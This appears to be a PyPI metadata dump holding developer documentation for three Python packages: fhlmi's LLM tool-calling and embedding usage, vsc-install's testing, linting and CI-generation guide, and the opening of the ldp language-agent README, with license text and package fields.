When tools are provided, the LLM's response will be wrapped in a `ToolRequestMessage` instead of a regular `Message`. The key differences are:

- `Message` represents a basic chat message with a role (system/user/assistant) and content
- `ToolRequestMessage` extends `Message` with `tool_calls`, a list of `ToolCall` objects describing the tools the LLM chose to invoke and their arguments

Further details about how to define a tool and use the `ToolRequestMessage` and `ToolCall` objects can be found in the [Aviary documentation](https://github.com/Future-House/aviary?tab=readme-ov-file#tool).
Here is a minimal example:

```python
import operator

from aviary.core import Message, Tool
from lmi import LiteLLMModel


# Define a function that will be used as a tool
def calculator(operation: str, x: float, y: float) -> float:
    """
    Performs basic arithmetic operations on two numbers.

    Args:
        operation (str): The arithmetic operation to perform ("+", "-", "*", or "/")
        x (float): The first number
        y (float): The second number

    Returns:
        float: The result of applying the operation to x and y

    Raises:
        KeyError: If operation is not one of "+", "-", "*", "/"
        ZeroDivisionError: If operation is "/" and y is 0
    """
    operations = {
        "+": operator.add,
        "-": operator.sub,
        "*": operator.mul,
        "/": operator.truediv,
    }
    return operations[operation](x, y)


# Create a tool from the calculator function
calculator_tool = Tool.from_function(calculator)

# The LLM must use the calculator tool
llm = LiteLLMModel()
result = await llm.call_single(
    messages=[Message(content="What is 2 + 2?")],
    tools=[calculator_tool],
    tool_choice=LiteLLMModel.TOOL_CHOICE_REQUIRED,
)
# result.messages[0] will be a ToolRequestMessage with tool_calls containing
# the calculator invocation with x=2, y=2, operation="+"
```

### Vertex

Vertex requires a bit of extra setup. First, install the extra dependency for auth:

```sh
pip install google-api-python-client
```

Then configure which region/project you're using for the model calls, and make sure you're authenticated for that region/project. Typically that means running:

```sh
gcloud auth application-default login
```

Then you can use Vertex models:

```py
from aviary.core import Message
from lmi import LiteLLMModel

vertex_config = {"vertex_project": "PROJECT_ID", "vertex_location": "REGION"}
llm = LiteLLMModel(name="vertex_ai/gemini-2.5-pro", config=vertex_config)
await llm.call_single("hey")
```

### Embedding models

This client also includes embedding models.
An embedding model is a class that inherits from `EmbeddingModel` and implements the `embed_documents` method, which receives a list of strings and returns one embedding (a list of floats) per string.

Currently, the following embedding models are supported:

- `LiteLLMEmbeddingModel`
- `SparseEmbeddingModel`
- `SentenceTransformerEmbeddingModel`
- `HybridEmbeddingModel`

#### LiteLLMEmbeddingModel

`LiteLLMEmbeddingModel` provides a wrapper around LiteLLM's embedding functionality. It supports various embedding models through the LiteLLM interface, with automatic dimension inference and token limit handling. It defaults to `text-embedding-3-small` and can be configured with `name` and `config` parameters. Note that `LiteLLMEmbeddingModel` can also be rate limited.

```python
from lmi import LiteLLMEmbeddingModel

model = LiteLLMEmbeddingModel(
    name="text-embedding-3-small",
    config={"rate_limit": "100/minute", "batch_size": 16},
)
embeddings = await model.embed_documents(["text1", "text2", "text3"])
```

#### HybridEmbeddingModel

`HybridEmbeddingModel` combines multiple embedding models by concatenating their outputs. It is typically used to combine a dense embedding model (like `LiteLLMEmbeddingModel`) with a sparse embedding model for improved performance:

```python
from lmi import HybridEmbeddingModel, LiteLLMEmbeddingModel, SparseEmbeddingModel

dense_model = LiteLLMEmbeddingModel(name="text-embedding-3-small")
sparse_model = SparseEmbeddingModel()
hybrid_model = HybridEmbeddingModel(models=[dense_model, sparse_model])
```

The resulting embedding dimension is the sum of the dimensions of all component models. For example, combining a 1536-dimensional dense embedding with a 256-dimensional sparse embedding yields a 1792-dimensional embedding.
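The concatenation behavior can be sketched in plain Python. This is an illustrative sketch only, not `lmi`'s implementation; the `hybrid_embed` helper and the stand-in `dense`/`sparse` "models" below are hypothetical:

```python
# Illustrative sketch of how a hybrid model concatenates per-document
# embeddings from its component models (not lmi's actual implementation).
def hybrid_embed(documents: list[str], models: list) -> list[list[float]]:
    # Each component model returns one vector per document
    per_model = [model(documents) for model in models]
    # For each document, concatenate the vectors from all models
    return [
        [value for vector in doc_vectors for value in vector]
        for doc_vectors in zip(*per_model)
    ]


# Stand-in "models": a fake 3-dim dense model and a fake 2-dim sparse model
dense = lambda docs: [[0.1, 0.2, 0.3] for _ in docs]
sparse = lambda docs: [[1.0, 0.0] for _ in docs]

embeddings = hybrid_embed(["text1", "text2"], [dense, sparse])
# Each hybrid embedding is 3 + 2 = 5 dimensional
```

This mirrors the dimension arithmetic described above: the hybrid dimension is simply the sum of the component dimensions.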
#### SentenceTransformerEmbeddingModel

You can also use `sentence-transformers`, a local embedding library with support for HuggingFace models, by installing `lmi[local]`.
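Returning to the rate-limit string format described under [Rate Limit Format](#rate-limit-format): the grammar can be sketched with a short standalone parser. This is illustrative only; `lmi` delegates actual parsing to the `limits` package, and `parse_rate_limit` is a hypothetical helper, not part of the library:

```python
import re

# Illustrative parser for the "<count> [per|/] [n (optional)] <period>" grammar.
_RATE_RE = re.compile(
    r"(?P<count>\d+)\s*(?:per|/)\s*(?P<multiple>\d+)?\s*"
    r"(?P<period>second|minute|hour|day|month|year)s?",
    re.IGNORECASE,
)


def parse_rate_limit(spec: str) -> tuple[int, int, str]:
    """Return (count, period_multiple, period_name) for a rate-limit string."""
    match = _RATE_RE.fullmatch(spec.strip())
    if match is None:
        raise ValueError(f"Unrecognized rate limit: {spec!r}")
    return (
        int(match["count"]),
        int(match["multiple"] or 1),  # optional "n" defaults to 1
        match["period"].lower(),
    )


parse_rate_limit("100/minute")  # (100, 1, 'minute')
parse_rate_limit("5 per second")  # (5, 1, 'second')
parse_rate_limit("1000/day")  # (1000, 1, 'day')
```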
text/markdown
null
FutureHouse technical staff <hello@futurehouse.org>
null
null
Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. 
For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. 
Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the 
Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. 
Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. 
To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright 2025 FutureHouse Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
null
[ "Intended Audience :: Developers", "License :: OSI Approved :: Apache Software License", "Operating System :: OS Independent", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "P...
[]
null
null
>=3.11
[]
[]
[]
[ "coredis>=3.0.1", "fhaviary>=0.14.0", "limits[async-redis]>=4.8", "litellm>=1.81.10", "pydantic>=2.10.1,~=2.0", "tiktoken>=0.4.0", "typing-extensions; python_version <= \"3.11\"", "fhaviary[xml]; extra == \"dev\"", "fhlmi[image,local,progress,typing,vcr]; extra == \"dev\"", "google-auth>=2; extra ...
[]
[]
[]
[ "issues, https://github.com/Future-House/ldp/packages/lmi/issues", "repository, https://github.com/Future-House/ldp/packages/lmi" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:19:43.489081
fhlmi-0.44.0.tar.gz
484,011
68/00/62e640f77cf9b0e27d94b58347291b6ab5c816ef0e157644d921337a6593/fhlmi-0.44.0.tar.gz
source
sdist
null
false
b26de7d518b1f5b644412b3412a85814
e08285cfd3f5208a737f47835611cb0234c3076908d90730c876855f891331e7
680062e640f77cf9b0e27d94b58347291b6ab5c816ef0e157644d921337a6593
null
[ "LICENSE" ]
1,152
2.1
vsc-install
0.24.0
vsc-install provides shared setuptools functions and classes for python libraries developed by UGent's HPC group
Description
===========

vsc-install provides shared setuptools functions and classes for Python libraries developed by UGent's HPC group.

Common pitfalls
===============

bdist_rpm will fail if your install_requires = 'setuptools' because it will fail to find a setuptools rpm.

```
export VSC_RPM_PYTHON=1
```

will make sure the `python-` prefix is added to the packages in install_requires for building RPMs, so python-setuptools will be used.

Add tests
=========

Tests are python modules in the `test` directory which have a subclass of `TestCase` and at least one method whose name starts with `test_`.

You are advised to use

```python
from vsc.install.testing import TestCase
```

(instead of the basic `TestCase` from `unittest`). Any `__main__` or `suite()` is not needed (anymore).

Initialise the test directory with

```bash
mkdir -p test
echo '' > test/__init__.py
echo 'from vsc.install.commontest import CommonTest' > test/00-import.py
```

When the tests are run, `test`, `lib` and `bin` (if relevant) are added to `sys.path`, so there is no need to do so in the test modules.

Run tests
=========

```bash
python setup.py test
```

Filter tests with `-F` (test module names) and `-f` (test method names).

See also

```bash
python setup.py test --help
```

The dependencies are installed automatically in the `.eggs` directory. It will first try `github.ugent.be` and then `github.com` to install them, using the same method through which the original repository was cloned (http, ssh, ...). In case you need private dependencies, always clone with ssh.

If the following error occurs, it means there is a test module `XYZ` that cannot be imported.
```txt
File "setup.py", line 499, in loadTestsFromModule
    testsuites = ScanningLoader.loadTestsFromModule(self, module)
File "build/bdist.linux-x86_64/egg/setuptools/command/test.py", line 37, in loadTestsFromModule
File "/usr/lib64/python2.7/unittest/loader.py", line 100, in loadTestsFromName
    parent, obj = obj, getattr(obj, part)
AttributeError: 'module' object has no attribute 'XYZ'
```

You can try to get the actual import error, to fix the issue, with

```bash
python -c 'import sys; sys.path.insert(0, "test"); import XYZ'
```

Fix failing tests
=================

* Missing / incorrect `LICENSE`
  * Copy the appropriate license file under `known_licenses` in the project directory and name the file `LICENSE`
* Missing `README.md`
  * Create a `README.md` file with at least a `Description` section
* Fix license headers as described in https://github.com/hpcugent/vsc-install/blob/master/lib/vsc/install/headers.py

  ```
  cd <project dir with .git folder>
  REPO_BASE_DIR=$PWD python -m vsc.install.headers path/to/file script_or_not
  ```

  Fix them all at once using find:

  ```
  find ./{lib,test} -type f -name '*.py' | REPO_BASE_DIR=$PWD xargs -I '{}' python -m vsc.install.headers '{}'
  find ./bin -type f -name '*.py' | REPO_BASE_DIR=$PWD xargs -I '{}' python -m vsc.install.headers '{}' 1
  ```

  Do not forget to check the diff. Modules/scripts without a docstring (or the magic comment '### END OF HEADER'), including test modules, will get a correct header appended to the existing one. Add a docstring (or the magic comment) to resolve this.
* Python scripts (i.e. with a python shebang and installed as scripts in setup) have to use `#!/usr/bin/env python` as shebang
* Remove any `build_rpms_settings.sh` leftovers
* The `TARGET` dict in `setup.py` should be minimal unless you really know what you are doing (i.e. if it is truly different from the defaults)
  * Remove `name`, `scripts`, ...
* `Exception: vsc namespace packages do not allow non-shared namespace`
  * Add to the `__init__.py`:

    ```python
    """
    Allow other packages to extend this namespace, zip safe setuptools style
    """
    import pkg_resources
    pkg_resources.declare_namespace(__name__)
    ```

bare-except
-----------

```python
try:
    # something
except:
```

This is bad, because this except will also catch `sys.exit()` or `KeyboardInterrupt`, something you typically do not want: if you catch these, the program ends up in a weird state and continues on, while the person who just pressed Ctrl+C wonders what is going on and why it is not stopping.

So at the very least make this `except Exception` (which doesn't catch `sys.exit()` and `KeyboardInterrupt`), and it would be appreciated if you could actually figure out which exceptions to expect and only catch those, letting your program crash if something you did not intend happens; that helps developers catch weird errors on their side.

If you do something like

```python
try:
    Path(int(somestring)).write_text('important data')
except Exception:
    pass  # if somestring is not an integer, we didn't need to write anyway, but otherwise we do
```

because you know this string sometimes does not contain an integer, so the `int()` call can fail, you should really only catch `ValueError`: the code above will also swallow failures when your disk is full, or you don't have permissions, or any number of other reasons, and the important data will not be written out and nobody will notice anything!

if not 'a' in somelist -> if 'a' not in somelist
------------------------------------------------

This isn't that big of a deal, but if everyone is consistent it's less likely to introduce bugs when a `not` is added or removed where it didn't need to be. It also helps code review: `not in` reads better, like English.
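The bare-except advice above can be verified directly: `except Exception` lets `sys.exit()` and Ctrl+C propagate because `SystemExit` and `KeyboardInterrupt` inherit from `BaseException`, not `Exception`. The helper below is a hypothetical standalone check, not part of vsc-install:

```python
def handled_by_except_exception(exc: BaseException) -> bool:
    """Return True if `except Exception` would catch the given exception."""
    try:
        raise exc
    except Exception:  # deliberately NOT a bare except
        return True
    except BaseException:  # catches what `except Exception` let through
        return False


print(handled_by_except_exception(ValueError("boom")))  # True
print(handled_by_except_exception(SystemExit(1)))  # False
print(handled_by_except_exception(KeyboardInterrupt()))  # False
```

This is exactly why a bare `except:` is dangerous: it would return `True` for all three cases, silently swallowing exits and interrupts.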
arguments-differ
----------------

This will give you errors if you override a function of a superclass but don't use the same number of arguments (using fewer will surely give you errors), so the linter now catches this for you.

unused-argument
---------------

If you have a function definition which accepts an argument that is never used in the function body, this will now give an error. Clean up your function definition, or fix the error where you actually do need to take this argument into account.

unused-variable
---------------

Defining a variable and then not using it anymore smells bad: why did you do that? Sometimes you do things like

```python
out, exit_code = run_command(something)
```

but you are not interested in `out`, only in the exit code. In this case, write

```python
_, exit_code = run_command(something)
```

Using `_` as a variable name lets pylint and other readers know you do not intend to use that output in the first place.

reimported
----------

When you re-import a name somewhere else, usually this is just one import too many, or two imports with the same name. Pay attention.

```python
import six
from django import six
```

=>

```python
import six
from django import six as django_six
```

redefinition of unused name
---------------------------

This usually also points to something you did not expect:

```python
from vsc.accountpageclient import VscGroup

<snip>

class VscGroup(object):
    pass
```

=> Do you need the import? Use `import ... as ...`. Did you mean to use the same name? ...

Redefined builtin
-----------------

Use a different name, for example change

```python
def filter(b_b):
    """Function filter"""
    return b_b
```

=>

```python
def new_filter(b_b):
    """Function filter"""
    return b_b
```

logging-not-lazy
----------------

Don't use string interpolation when logging if not needed:

```python
import logging

name = 'world'
program = 'python'
logging.info('Hello %s! This is %s.' % (name, program))
```

=>

```python
import logging

name = 'world'
program = 'python'
logging.info('Hello %s! This is %s.', name, program)
```

Fix Python 3 failing tests
==========================

* We try to follow https://docs.python.org/3/howto/pyporting.html
* Some useful info can be found here as well: https://portingguide.readthedocs.io/en/latest/index.html

unpacking-in-except / redefine-in-handler
-----------------------------------------

Multiple exceptions have to be grouped in a tuple, like

```python
...
except (ExceptionOne, ExceptionTwo) ...
...
```

(especially when used like `except A, B:`, which should be `except (A, B):`).

Old raise syntax
----------------

Python 2's **raise** statement was designed at a time when exceptions weren't classes, and an exception's _type_, _value_, and _traceback_ components were three separate objects. In Python 3, one single object includes all information about an exception.

```python
raise NameError, "Error"
```

=>

```python
raise NameError("Error")
```

or change

```python
raise NameError, "Error", some_traceback
```

=>

```python
e = NameError("Error")
e.__traceback__ = some_traceback
raise e
```

backtick
--------

```python
A = 2
B = `A`
```

=>

```python
A = 2
B = str(A)
```

Old ne operator
---------------

```python
if 2 <> 3:
```

=>

```python
if 2 != 3:
```

Octal literal
-------------

```python
os.chmod(foo, 0700)
```

=>

```python
os.chmod(foo, 0o700)
```

Import star module level
------------------------

Do not import \*; be more specific. If that is impossible, import it at the top level (and suppress the pyflakes error F403).
```python
def coords(angle, distance):
    """Function coords"""
    from math import *
    return distance * cos(angle), distance * sin(angle)
```

=>

```python
from math import *  # noqa: F403


def coords(angle, distance):
    """Function coords"""
    return distance * cos(angle), distance * sin(angle)
```

Raising string
--------------

```python
raise ValueError, 'message'
```

=>

```python
raise ValueError('message')
```

Indexing exception
------------------

```python
except IndexError as err:
    err[0]
```

=>

```python
except IndexError as err:
    err.args[0]
```

turning off these errors
------------------------

If in any of these cases you think: yes, I really needed to do this (I'm monkeypatching things, I'm adding extra functionality that does indeed have an extra (default) parameter, etc.), you can let pylint know to ignore this error in one specific block of code by adding a comment like `# pylint: disable=<name or numeric id of pylint code>`:

```python
class Something(object):
    def dosomething(self, some, thing):
        pass  # do something


class MyFancyThing(Something):
    # pylint: disable=arguments-differ
    def dosomething(self, some, thing, fancy=None):
        pass  # do something fancy
```

The full list of codes is available at http://pylint-messages.wikidot.com/all-codes

Auto-generated `Jenkinsfile` / `tox.ini`
========================================

`vsc-install` has support for auto-generating the `Jenkinsfile` (and accompanying `tox.ini`), via:

```
python -m vsc.install.ci
```

Failing check on (contents of) `Jenkinsfile` or `tox.ini`
---------------------------------------------------------

There are dedicated tests that check whether the `Jenkinsfile` and `tox.ini` files were auto-generated by `vsc-install`. To fix these tests, simply run `python -m vsc.install.ci` using the latest version of `vsc-install` to re-generate `Jenkinsfile` and `tox.ini`, and then commit & push the changes.
If the contents of the file that is auto-generated by the latest version of `vsc-install` are incorrect for whatever reason, you can temporarily bypass the failing test by adding a file named `Jenkinsfile.NOT_AUTOGENERATED_YET` or `tox.ini.NOT_AUTOGENERATED_YET`. The file **must** contain the URL of a vsc-install issue, created via https://github.com/hpcugent/vsc-install/issues/new, where the incorrectly generated file is reported. Example: echo "see https://github.com/hpcugent/vsc-install/issues/1234 for more info" > Jenkinsfile.NOT_AUTOGENERATED_YET Requiring JIRA issue ref in PR title ------------------------------------ To also include a check in the `Jenkinsfile` for having a JIRA issue ref (like `[HPC-1234]`) in the pull request title, add a configuration file for `python -m vsc.install.ci` named `vsc-ci.ini` like this to the repository: ```ini [vsc-ci] jira_issue_id_in_pr_title=1 ``` Running shellcheck ------------------ To also run `shellcheck` in the generated `Jenkinsfile`, specify this via a `vsc-ci.ini` configuration file: ```ini [vsc-ci] run_shellcheck=1 ``` Adding additional test commands to Jenkinsfile ---------------------------------------------- If additional custom test commands (other than `shellcheck`) need to be run by the `Jenkinsfile`, you can specify this in `vsc-ci.ini` via `additional_test_commands`. To add a single custom test command: ```ini [vsc-ci] additional_test_commands=./more_test.sh ``` To add multiple test commands: ```ini [vsc-ci] additional_test_commands= first-test-cmd second-test-cmd third-test-cmd ``` Overriding install location of scripts -------------------------------------- In some repositories we specify a system-wide install location for scripts via `setup.cfg` (see for example the `icinga-checks` repository), which causes problems when installing `vsc-install` in the tox environment.
To override the installation prefix for scripts (only in the tox environment where the tests are run), specify this via a `vsc-ci.ini` configuration file: ```ini [vsc-ci] install_scripts_prefix_override=1 ``` Use 'easy_install' to install tox --------------------------------- For legacy reasons easy_install is still supported. If you still need it you can enable it (not recommended): ```ini [vsc-ci] easy_install_tox=1 ``` Avoid running ``pip install`` in repo checkout ---------------------------------------------- For some repositories, running ``pip install`` to install ``tox`` from the checked out repository is problematic, because of the ``setup.cfg`` containing things that should not be picked up by ``pip``. For those repositories, you can specify that the installation commands in the ``Jenkinsfile`` should be run from ``$HOME``, via: ```ini [vsc-ci] home_install=1 ``` Leveraging system (Python) packages ----------------------------------- If a repository requires Python packages as dependencies that are installed as OS packages (for example, ``pyslurm``), tox must be configured to inherit these packages in the test environment. This can be enabled via: ```ini [vsc-ci] inherit_site_packages=1 ``` Pre-installing dependencies before running tests ------------------------------------------------ Although ``vsc-install`` will automatically install all dependencies listed in ``setup.py`` prior to running the tests, there are cases where this doesn't work out as expected. Some Python packages only support being installed with ``pip install`` (for example because they use a namespace that is spread across multiple different Python packages, like ``fs`` and ``fs.sshfs``). 
You can specify Python packages that should be installed (with ``pip install``) before running the tests via ``pip_install_test_deps`` in ``vsc-ci.ini``: ```ini [vsc-ci] pip_install_test_deps= foo bar<1.0 ``` This results in corresponding ``pip install`` commands being added to the ``commands_pre`` section in ``tox.ini``: ```ini [testenv] commands_pre = pip install 'foo' pip install 'bar<1.0' pip install 'setuptools<42.0' python -m easy_install -U vsc-install ```
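The `vsc-ci.ini` options described in the sections above are not mutually exclusive: a single file can combine any of them. A hypothetical example enabling several of the documented settings at once (the command names and dependency specs are placeholders):

```ini
[vsc-ci]
jira_issue_id_in_pr_title=1
run_shellcheck=1
inherit_site_packages=1
additional_test_commands=
    first-test-cmd
    second-test-cmd
pip_install_test_deps=
    foo
    bar<1.0
```

After editing `vsc-ci.ini`, re-run `python -m vsc.install.ci` so the regenerated `Jenkinsfile` and `tox.ini` pick up the new settings.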
text/markdown
Stijn De Weirdt;Andy Georges;Jens Timmerman
stijn.deweirdt@ugent.be, andy.georges@ugent.be, jens.timmerman@ugent.be
Stijn De Weirdt;Andy Georges;Jens Timmerman
stijn.deweirdt@ugent.be, andy.georges@ugent.be, jens.timmerman@ugent.be
LGPLv2+
null
[ "License :: OSI Approved :: GNU Lesser General Public License v2 or later (LGPLv2+)" ]
[]
https://github.com/hpcugent/vsc-install
null
null
[]
[]
[]
[]
[]
[]
[]
[]
twine/6.2.0 CPython/3.9.18
2026-02-19T22:19:39.570466
vsc_install-0.24.0.tar.gz
85,034
8e/80/2122f7eda5e1d71480c37b79f87b1fb3f2473c22fd3deaebda435000e7a0/vsc_install-0.24.0.tar.gz
source
sdist
null
false
365668c822d68b77c02884e1f4c415c6
8425fa625e6ce244ab971a0b0253550724fe3aff9523b0de71402c8fb911f6a5
8e802122f7eda5e1d71480c37b79f87b1fb3f2473c22fd3deaebda435000e7a0
null
[]
264
2.4
ldp
0.44.0
Agent framework for constructing language model agents and training on constructive tasks.
# Language Decision Processes (LDP) <!-- pyml disable-num-lines 10 line-length --> [![GitHub](https://img.shields.io/badge/github-%23121011.svg?style=for-the-badge&logo=github&logoColor=white)](https://github.com/Future-House/ldp) [![Project Status: Active](https://www.repostatus.org/badges/latest/active.svg)](https://www.repostatus.org/#active) ![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg) [![Docs](https://assets.readthedocs.org/static/projects/badges/passing-flat.svg)](https://futurehouse.gitbook.io/futurehouse-cookbook/ldp-language-decision-processes) [![PyPI version](https://badge.fury.io/py/ldp.svg)](https://badge.fury.io/py/ldp) [![tests](https://github.com/Future-House/ldp/actions/workflows/tests.yml/badge.svg)](https://github.com/Future-House/ldp) [![CodeFactor](https://www.codefactor.io/repository/github/future-house/ldp/badge)](https://www.codefactor.io/repository/github/future-house/ldp) [![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black) [![python](https://img.shields.io/badge/python-3.11%20%7C%203.12%20%7C%203.13-blue?style=flat&logo=python&logoColor=white)](https://www.python.org) <p align="center"> <a href="https://arxiv.org/abs/2412.21154"> <img src="docs/assets/ldp_chessboard.png" width="300" alt="row playing chess" /> </a> </p> **LDP** [^1] is a framework for enabling modular interchange of language agents, environments, and optimizers. A language decision process (LDP) is a partially-observable Markov decision process (POMDP) where actions and observations consist of natural language. The full definition from the Aviary paper [^1] is: <p align="left"> <a href="https://arxiv.org/abs/2412.21154"> <img src="docs/assets/ldp_definition.png" width="600" alt="LDP definition from paper" /> </a> </p> See the following [tutorial](https://github.com/Future-House/ldp/blob/main/tutorials/creating_a_language_agent.ipynb) for an example of how to run an LDP agent. 
[Overview](#overview) | [Getting Started](#getting-started) | [Documentation](https://futurehouse.gitbook.io/futurehouse-cookbook/ldp-language-decision-processes) | [Paper](https://arxiv.org/abs/2412.21154) ## What's New? - Check out our new [Tutorial](https://github.com/Future-House/ldp/blob/main/tutorials/creating_a_language_agent.ipynb) notebook on running an LDP agent in an Aviary environment! - The Aviary paper has been posted to [arXiv](https://arxiv.org/abs/2412.21154)! Further updates forthcoming! ## Overview <p align="left"> <a href="https://arxiv.org/abs/2412.21154"> <img src="docs/assets/Aviary.png" width="800" alt="Aviary and LDP overview from paper" /> </a> </p> A pictorial overview of the language decision process (LDP) framework together with five implemented Aviary environments. ## Getting Started To install `ldp`: ```bash pip install -e . ``` To install `aviary` and the `nn` (neural network) module required for the tutorials: ```bash pip install "ldp[nn]" "fhaviary[gsm8k]" ``` If you plan to export Graphviz visualizations, the `graphviz` library is required: - Linux: `apt install graphviz` - macOS: `brew install graphviz` ## Tutorial Notebooks 1. [Creating a Simple Language Agent][1] 2. 
[Evaluating a Llama Agent on GSM8K][2] [1]: https://github.com/Future-House/ldp/blob/main/tutorials/creating_a_language_agent.ipynb [2]: https://github.com/Future-House/ldp/blob/main/tutorials/evaluating_a_llama_agent.ipynb ## Running an Agent on an Aviary Environment The minimal example below illustrates how to run a language agent on an Aviary environment (Aviary is LDP's sister library for defining language agent environments: <https://github.com/Future-House/aviary>): ```py from ldp.agent import SimpleAgent from aviary.core import DummyEnv env = DummyEnv() agent = SimpleAgent() obs, tools = await env.reset() agent_state = await agent.init_state(tools=tools) done = False while not done: action, agent_state, _ = await agent.get_asv(agent_state, obs) obs, reward, done, truncated = await env.step(action.value) ``` Below we elaborate on the components of LDP. ## Agent An agent interacts with an environment to accomplish a task. Agents may use tools (calls to external APIs, e.g. Wolfram Alpha) in response to observations returned by the environment. Below we define LDP's `SimpleAgent`, which relies on a single LLM call. The main bookkeeping involves appending messages received from the environment and passing tools.
